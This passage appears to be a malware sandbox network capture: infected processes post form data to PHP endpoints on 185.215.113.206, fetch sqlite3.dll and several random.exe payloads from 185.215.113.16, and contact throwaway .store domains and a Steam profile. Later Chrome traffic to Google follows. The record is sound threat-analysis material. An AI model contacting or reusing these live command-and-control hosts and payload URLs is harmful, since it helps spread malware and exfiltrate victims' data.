Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Date: Mon, 11 Nov 2024 08:40:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 277
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
POST

http://185.215.113.206/6c4adf523b719729.php

3f60z.exe

Remote address:

185.215.113.206:80

Request

POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HJJEHJJKJEGHJJKEBFBG
Host: 185.215.113.206
Content-Length: 473
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Date: Mon, 11 Nov 2024 08:40:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 277
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
POST

http://185.215.113.206/6c4adf523b719729.php

3f60z.exe

Remote address:

185.215.113.206:80

Request

POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HCFBKKEBKEBGIDHIEHCF
Host: 185.215.113.206
Content-Length: 5020
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Date: Mon, 11 Nov 2024 08:40:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 277
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
GET

http://185.215.113.206/746f34465cf17784/sqlite3.dll

3f60z.exe

Remote address:

185.215.113.206:80

Request

GET /746f34465cf17784/sqlite3.dll HTTP/1.1
Host: 185.215.113.206
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Date: Mon, 11 Nov 2024 08:40:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 277
Content-Type: text/html; charset=iso-8859-1
POST

http://185.215.113.206/6c4adf523b719729.php

3f60z.exe

Remote address:

185.215.113.206:80

Request

POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HIIEBAFCBKFIDGCAKKKF
Host: 185.215.113.206
Content-Length: 472
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Date: Mon, 11 Nov 2024 08:40:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 277
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
POST

http://185.215.113.206/6c4adf523b719729.php

3f60z.exe

Remote address:

185.215.113.206:80

Request

POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GIEHJKEBAAEBGCAAEBFH
Host: 185.215.113.206
Content-Length: 470
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Date: Mon, 11 Nov 2024 08:40:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 277
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
POST

http://185.215.113.206/6c4adf523b719729.php

3f60z.exe

Remote address:

185.215.113.206:80

Request

POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IJKKKFCFHCFIECBGDHID
Host: 185.215.113.206
Content-Length: 465
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Date: Mon, 11 Nov 2024 08:40:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 277
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
POST

http://185.215.113.206/6c4adf523b719729.php

3f60z.exe

Remote address:

185.215.113.206:80

Request

POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BFHIJEBKEBGHIDHJKJEG
Host: 185.215.113.206
Content-Length: 465
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Date: Mon, 11 Nov 2024 08:40:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 277
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
DNS

174.82.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

174.82.21.104.in-addr.arpa

IN PTR

Response
DNS

43.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.113.215.185.in-addr.arpa

IN PTR

Response
GET

http://185.215.113.16/luma/random.exe

skotes.exe

Remote address:

185.215.113.16:80

Request

GET /luma/random.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 11 Nov 2024 08:40:36 GMT
Content-Type: application/octet-stream
Content-Length: 3150848
Last-Modified: Mon, 11 Nov 2024 08:15:09 GMT
Connection: keep-alive
ETag: "6731bd0d-301400"
Accept-Ranges: bytes
GET

http://185.215.113.16/steam/random.exe

skotes.exe

Remote address:

185.215.113.16:80

Request

GET /steam/random.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 11 Nov 2024 08:40:40 GMT
Content-Type: application/octet-stream
Content-Length: 1841152
Last-Modified: Mon, 11 Nov 2024 08:15:23 GMT
Connection: keep-alive
ETag: "6731bd1b-1c1800"
Accept-Ranges: bytes
GET

http://185.215.113.16/off/random.exe

skotes.exe

Remote address:

185.215.113.16:80

Request

GET /off/random.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 11 Nov 2024 08:40:45 GMT
Content-Type: application/octet-stream
Content-Length: 2882048
Last-Modified: Mon, 11 Nov 2024 07:50:26 GMT
Connection: keep-alive
ETag: "6731b742-2bfa00"
Accept-Ranges: bytes
DNS

206.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.113.215.185.in-addr.arpa

IN PTR

Response
DNS

16.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

16.113.215.185.in-addr.arpa

IN PTR

Response
DNS

presticitpo.store

c3a87ab7a9.exe

Remote address:

8.8.8.8:53

Request

presticitpo.store

IN A

Response
DNS

crisiwarny.store

c3a87ab7a9.exe

Remote address:

8.8.8.8:53

Request

crisiwarny.store

IN A

Response
DNS

fadehairucw.store

c3a87ab7a9.exe

Remote address:

8.8.8.8:53

Request

fadehairucw.store

IN A

Response
DNS

thumbystriw.store

c3a87ab7a9.exe

Remote address:

8.8.8.8:53

Request

thumbystriw.store

IN A

Response
DNS

necklacedmny.store

c3a87ab7a9.exe

Remote address:

8.8.8.8:53

Request

necklacedmny.store

IN A

Response
DNS

founpiuer.store

c3a87ab7a9.exe

Remote address:

8.8.8.8:53

Request

founpiuer.store

IN A

Response
POST

https://navygenerayk.store/api

c3a87ab7a9.exe

Remote address:

104.21.56.225:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: navygenerayk.store

Response

HTTP/1.1 200 OK

Date: Mon, 11 Nov 2024 08:40:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=nnfd4sbckp5eqm6lultf2l1q64; expires=Fri, 07-Mar-2025 02:27:18 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iRjvwSAuD18P5y7IrNayBQHBlCvy2p6siaPNPrWHSR0XmVey3U5ivQtQjCpEhiSfEuupgEKeXUpReRrtiUOesEJVf9zyFeFdd4F4FKSWAEqldItl42c%2BDXDE4qbnZbG3OBFjXO8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e0cfa90691acd95-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=47937&sent=6&recv=8&lost=0&retrans=0&sent_bytes=3302&recv_bytes=609&delivery_rate=93397&cwnd=253&unsent_bytes=0&cid=bcf183d62e7b9e19&ts=315&x=0"
DNS

scriptyprefej.store

c3a87ab7a9.exe

Remote address:

8.8.8.8:53

Request

scriptyprefej.store

IN A

Response
GET

https://steamcommunity.com/profiles/76561199724331900

c3a87ab7a9.exe

Remote address:

104.82.234.109:443

Request

GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Mon, 11 Nov 2024 08:40:40 GMT
Content-Length: 36020
Connection: keep-alive
Set-Cookie: sessionid=042c7dfb8956543d1459a340; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=GB%7Ce15d564837abb028acb4e114150d704d; Path=/; Secure; HttpOnly; SameSite=None
POST

https://marshal-zhukov.com/api

c3a87ab7a9.exe

Remote address:

104.21.82.174:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: marshal-zhukov.com

Response

HTTP/1.1 200 OK

Date: Mon, 11 Nov 2024 08:40:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=u9j75bhu1630oq8r64aa3mfrkb; expires=Fri, 07-Mar-2025 02:27:19 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2tG3A3TNljdSW5jSwuhGEUHLMVfm7iaFiXlUa%2FmE79exXud41MQFRt37YkAQtY0vCdRZavzXxsCP%2BJIFWlJq%2FxCqLAEFdONfrMakvSdVsT6KsJZGHQh1%2FlUAojRqk64dCgT4FVA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e0cfa95b9c1414d-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=41962&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3306&recv_bytes=609&delivery_rate=95312&cwnd=253&unsent_bytes=0&cid=9860904ca9d02944&ts=295&x=0"
GET

http://185.215.113.206/

2d902fdd78.exe

Remote address:

185.215.113.206:80

Request

GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Mon, 11 Nov 2024 08:40:42 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.206/c4becf79229cb002.php

2d902fdd78.exe

Remote address:

185.215.113.206:80

Request

POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FIEGCBKEGCFCBFIDBFII
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Mon, 11 Nov 2024 08:40:42 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 180
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.206/c4becf79229cb002.php

2d902fdd78.exe

Remote address:

185.215.113.206:80

Request

POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CBFCBKKFBAEHJKEBKFCB
Host: 185.215.113.206
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Mon, 11 Nov 2024 08:40:42 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 2028
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.206/c4becf79229cb002.php

2d902fdd78.exe

Remote address:

185.215.113.206:80

Request

POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HCFBKKEBKEBGIDHIEHCF
Host: 185.215.113.206
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Mon, 11 Nov 2024 08:40:43 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 7116
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.206/c4becf79229cb002.php

2d902fdd78.exe

Remote address:

185.215.113.206:80

Request

POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JJJJEBGDAFHJEBGDGIJD
Host: 185.215.113.206
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Mon, 11 Nov 2024 08:40:43 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 108
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.206/c4becf79229cb002.php

2d902fdd78.exe

Remote address:

185.215.113.206:80

Request

POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JJJEGHDAECBFHJKEGIJK
Host: 185.215.113.206
Content-Length: 4811
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Mon, 11 Nov 2024 08:40:43 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.215.113.206/68b591d6548ec281/sqlite3.dll

2d902fdd78.exe

Remote address:

185.215.113.206:80

Request

GET /68b591d6548ec281/sqlite3.dll HTTP/1.1
Host: 185.215.113.206
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Mon, 11 Nov 2024 08:40:43 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
ETag: "10e436-5e7ec6832a180"
Accept-Ranges: bytes
Content-Length: 1106998
Content-Type: application/x-msdos-program
DNS

www.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.180.4
GET

https://www.google.com/async/ddljson?async=ntp:2

chrome.exe

Remote address:

142.250.180.4:443

Request

GET /async/ddljson?async=ntp:2 HTTP/2.0
host: www.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0

chrome.exe

Remote address:

142.250.180.4:443

Request

GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/2.0
host: www.google.com
x-client-data: CMnmygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://www.google.com/async/newtab_promos

chrome.exe

Remote address:

142.250.180.4:443

Request

GET /async/newtab_promos HTTP/2.0
host: www.google.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
DNS

ogads-pa.googleapis.com

chrome.exe

Remote address:

8.8.8.8:53

Request

ogads-pa.googleapis.com

IN A

Response

ogads-pa.googleapis.com

IN A

216.58.212.202

ogads-pa.googleapis.com

IN A

142.250.200.10

ogads-pa.googleapis.com

IN A

216.58.201.106

ogads-pa.googleapis.com

IN A

142.250.178.10

ogads-pa.googleapis.com

IN A

216.58.204.74

ogads-pa.googleapis.com

IN A

142.250.187.202

ogads-pa.googleapis.com

IN A

172.217.16.234

ogads-pa.googleapis.com

IN A

142.250.187.234

ogads-pa.googleapis.com

IN A

172.217.169.74

ogads-pa.googleapis.com

IN A

216.58.213.10

ogads-pa.googleapis.com

IN A

142.250.180.10

ogads-pa.googleapis.com

IN A

172.217.169.10

ogads-pa.googleapis.com

IN A

172.217.169.42

ogads-pa.googleapis.com

IN A

142.250.200.42

ogads-pa.googleapis.com

IN A

142.250.179.234
DNS

apis.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

apis.google.com

IN A

Response

apis.google.com

IN CNAME

plus.l.google.com

plus.l.google.com

IN A

216.58.201.110
OPTIONS

https://ogads-pa.googleapis.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData

chrome.exe

Remote address:

216.58.212.202:443

Request

OPTIONS /$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData HTTP/2.0
host: ogads-pa.googleapis.com
accept: */*
access-control-request-method: POST
access-control-request-headers: content-type,x-goog-api-key,x-user-agent
origin: chrome-untrusted://new-tab-page
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-fetch-mode: cors
sec-fetch-site: cross-site
sec-fetch-dest: empty
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
POST

https://ogads-pa.googleapis.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData

chrome.exe

Remote address:

216.58.212.202:443

Request

POST /$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData HTTP/2.0
host: ogads-pa.googleapis.com
content-length: 69
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
x-user-agent: grpc-web-javascript/0.1
x-goog-api-key: AIzaSyCbsbvGCe7C9mCtdaTycZB2eUFuzsYKG_E
content-type: application/json+protobuf
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
origin: chrome-untrusted://new-tab-page
x-client-data: CMnmygE=
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
DNS

106.201.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

106.201.58.216.in-addr.arpa

IN PTR

Response

106.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f101e100net

106.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f106�I

106.201.58.216.in-addr.arpa

IN PTR

lhr48s48-in-f10�I
DNS

3.180.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

3.180.250.142.in-addr.arpa

IN PTR

Response

3.180.250.142.in-addr.arpa

IN PTR

lhr25s32-in-f31e100net
DNS

227.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

227.187.250.142.in-addr.arpa

IN PTR

Response

227.187.250.142.in-addr.arpa

IN PTR

lhr25s34-in-f31e100net
GET

https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0

chrome.exe

Remote address:

216.58.201.110:443

Request

GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/2.0
host: apis.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: CMnmygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=hQ2V-9mP8-0guG3AOe1Juq4vTb_l8ARZoAP8h4wTFC-fPVPHaYhEkOZBe1ntZyEXvV_ldmq3BubY4vXR65hSKelP34_vr71HUz3PmbFbCb2SiZ1LIRS6_CjJJd0SNy6wCoUwxTmkdH2NLxp5MCVK7lWK3lBCW3O384NZo7C_YjRwghkV9fAbVSUNyrLuaF9tFrA
DNS

play.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

172.217.16.238
DNS

202.212.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

202.212.58.216.in-addr.arpa

IN PTR

Response

202.212.58.216.in-addr.arpa

IN PTR

ams16s21-in-f101e100net

202.212.58.216.in-addr.arpa

IN PTR

ams16s21-in-f202�I

202.212.58.216.in-addr.arpa

IN PTR

lhr25s27-in-f10�I
POST

https://play.google.com/log?format=json&hasfast=true

chrome.exe

Remote address:

172.217.16.238:443

Request

POST /log?format=json&hasfast=true HTTP/2.0
host: play.google.com
content-length: 1418
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
content-type: application/x-www-form-urlencoded;charset=UTF-8
accept: */*
origin: chrome-untrusted://new-tab-page
x-client-data: CMnmygE=
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=hQ2V-9mP8-0guG3AOe1Juq4vTb_l8ARZoAP8h4wTFC-fPVPHaYhEkOZBe1ntZyEXvV_ldmq3BubY4vXR65hSKelP34_vr71HUz3PmbFbCb2SiZ1LIRS6_CjJJd0SNy6wCoUwxTmkdH2NLxp5MCVK7lWK3lBCW3O384NZo7C_YjRwghkV9fAbVSUNyrLuaF9tFrA
DNS

110.201.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

110.201.58.216.in-addr.arpa

IN PTR

Response

110.201.58.216.in-addr.arpa

IN PTR

lhr48s48-in-f141e100net

110.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f14�I

110.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f110�I
DNS

238.16.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

238.16.217.172.in-addr.arpa

IN PTR

Response

238.16.217.172.in-addr.arpa

IN PTR

mad08s04-in-f141e100net

238.16.217.172.in-addr.arpa

IN PTR

lhr48s28-in-f14�I
DNS

clients2.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

clients2.google.com

IN A

Response

clients2.google.com

IN CNAME

clients.l.google.com

clients.l.google.com

IN A

142.250.187.238
GET

https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D35%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D35%2526e%253D1

chrome.exe

Remote address:

142.250.187.238:443

Request

GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D35%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D35%2526e%253D1 HTTP/2.0
host: clients2.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=23.SE=CoJO3Zp8lVUtU91_XNdWjfS7I4nkqgst347Zck5ZSGZZzDjd4Z9fhO0zkAbGGOAkETO5vqhtuQpvY1qP9CWlC2PDkdMuFwzmp9CsHp33fQxJFclqw5vcUfy5s_ulVN5R_-ekdosoKJFIHzKJw1vAxNDIWaotSPE0PWoszdFVQQxB5X_yDlx4CtfsflKK65Bh1Dm0uyyb5A
DNS

clients2.googleusercontent.com

chrome.exe

Remote address:

8.8.8.8:53

Request

clients2.googleusercontent.com

IN A

Response

clients2.googleusercontent.com

IN CNAME

googlehosted.l.googleusercontent.com

googlehosted.l.googleusercontent.com

IN A

216.58.213.1
GET

https://clients2.googleusercontent.com/crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx

chrome.exe

Remote address:

216.58.213.1:443

Request

GET /crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/2.0
host: clients2.googleusercontent.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
DNS

238.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

238.187.250.142.in-addr.arpa

IN PTR

Response

238.187.250.142.in-addr.arpa

IN PTR

lhr25s34-in-f141e100net
DNS

1.213.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.213.58.216.in-addr.arpa

IN PTR

Response

1.213.58.216.in-addr.arpa

IN PTR

lhr25s25-in-f11e100net

1.213.58.216.in-addr.arpa

IN PTR

ber01s14-in-f1�F
POST

